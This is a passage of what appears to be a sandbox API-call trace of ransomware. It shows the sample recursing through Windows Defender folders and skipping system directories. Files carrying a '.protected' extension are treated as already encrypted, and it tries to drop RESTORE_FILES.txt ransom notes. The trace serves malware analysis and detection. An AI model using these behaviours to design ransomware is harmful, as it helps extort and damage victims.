lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.265] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.265] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt") returned 93 [0093.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\backup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.265] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.265] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt") returned 86 [0093.265] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.265] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.265] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="Windows") returned -1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="Program Files") returned 1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="Program Files (x86)") returned 1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="$Recycle.bin") returned 1 [0093.265] lstrcmpiW (lpString1="Updates", lpString2="System Volume Information") returned 1 [0093.265] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 76 [0093.265] lstrcmpW (lpString1="Updates", lpString2=".") returned 1 [0093.265] lstrcmpW (lpString1="Updates", lpString2="..") returned 1 [0093.265] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned 78 [0093.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.265] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.265] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.265] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.265] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.266] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.266] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\.") returned 78 [0093.266] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.266] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.266] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.266] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.266] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.266] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.266] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.266] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\..") returned 79 [0093.266] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.266] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.266] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.266] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.266] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt") returned 94 [0093.266] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.266] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.266] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.266] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.266] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt") returned 94 [0093.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.266] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.266] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Windows") returned -1 [0093.266] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Program Files") returned -1 [0093.266] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="System Volume Information") returned -1 [0093.267] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 107 [0093.267] lstrcmpW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2=".") returned 1 [0093.267] lstrcmpW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="..") returned 1 [0093.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*") returned 109 [0093.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.267] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.267] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.267] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\.") returned 109 [0093.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.267] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.267] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.267] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.267] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\..") returned 110 [0093.267] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.267] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.267] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="Windows") returned -1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="Program Files") returned -1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1="mpasbase.vdm.protected", lpString2="System Volume Information") returned -1 [0093.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.protected") returned 130 [0093.267] StrStrIW (lpFirst="mpasbase.vdm.protected", lpSrch=".protected") returned=".protected" [0093.267] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="Windows") returned -1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="Program Files") returned -1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="Program Files (x86)") returned -1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="$Recycle.bin") returned 1 [0093.267] lstrcmpiW (lpString1="mpasdlta.vdm.protected", lpString2="System Volume Information") returned -1 [0093.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.protected") returned 130 [0093.268] StrStrIW (lpFirst="mpasdlta.vdm.protected", lpSrch=".protected") returned=".protected" [0093.268] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="Windows") returned -1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="Program Files") returned -1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="Program Files (x86)") returned -1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="$Recycle.bin") returned 1 [0093.268] lstrcmpiW (lpString1="mpengine.dll.protected", lpString2="System Volume Information") returned -1 [0093.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.protected") returned 130 [0093.268] StrStrIW (lpFirst="mpengine.dll.protected", lpSrch=".protected") returned=".protected" [0093.268] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.268] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt") returned 125 [0093.268] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.268] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.268] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.268] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt") returned 125 [0093.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.268] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.268] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.269] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt") returned 86 [0093.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.269] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="Windows") returned -1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="Program Files") returned -1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="Program Files (x86)") returned -1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="$Recycle.bin") returned 1 [0093.269] lstrcmpiW (lpString1="LocalCopy", lpString2="System Volume Information") returned -1 [0093.269] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned 59 [0093.269] lstrcmpW (lpString1="LocalCopy", lpString2=".") returned 1 [0093.269] lstrcmpW (lpString1="LocalCopy", lpString2="..") returned 1 [0093.269] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*") returned 61 [0093.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.269] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.269] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.269] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.269] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.269] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.270] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\.") returned 61 [0093.270] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.270] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.270] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.270] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.270] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.270] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.270] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.270] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\..") returned 62 [0093.270] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.270] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.270] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.270] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.270] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt") returned 77 [0093.270] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.270] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.270] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.270] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.271] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt") returned 77 [0093.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\localcopy\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.271] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="Windows") returned -1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="Program Files") returned 1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="Program Files (x86)") returned 1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="$Recycle.bin") returned 1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="System Volume Information") returned -1 [0093.271] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned 60 [0093.271] lstrcmpW (lpString1="Quarantine", lpString2=".") returned 1 [0093.271] lstrcmpW (lpString1="Quarantine", lpString2="..") returned 1 [0093.271] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*") returned 62 [0093.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.271] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.271] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.271] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.271] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.271] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.271] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\.") returned 62 [0093.271] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.271] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.271] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.271] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.271] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.272] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.272] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.272] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\..") returned 63 [0093.272] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.272] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.272] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt") returned 78 [0093.272] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.272] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.272] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.272] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.272] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt") returned 78 [0093.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\quarantine\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.273] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.273] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\RESTORE_FILES.txt") returned 67 [0093.273] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.273] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.273] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="Windows") returned -1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="Program Files") returned 1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="Program Files (x86)") returned 1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="$Recycle.bin") returned 1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="System Volume Information") returned -1 [0093.273] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned 55 [0093.273] lstrcmpW (lpString1="Scans", lpString2=".") returned 1 [0093.273] lstrcmpW (lpString1="Scans", lpString2="..") returned 1 [0093.273] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*") returned 57 [0093.273] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.273] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.273] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.273] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.273] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.273] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.273] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\.") returned 57 [0093.273] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.273] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.273] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.273] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.273] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.273] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.274] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.274] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, 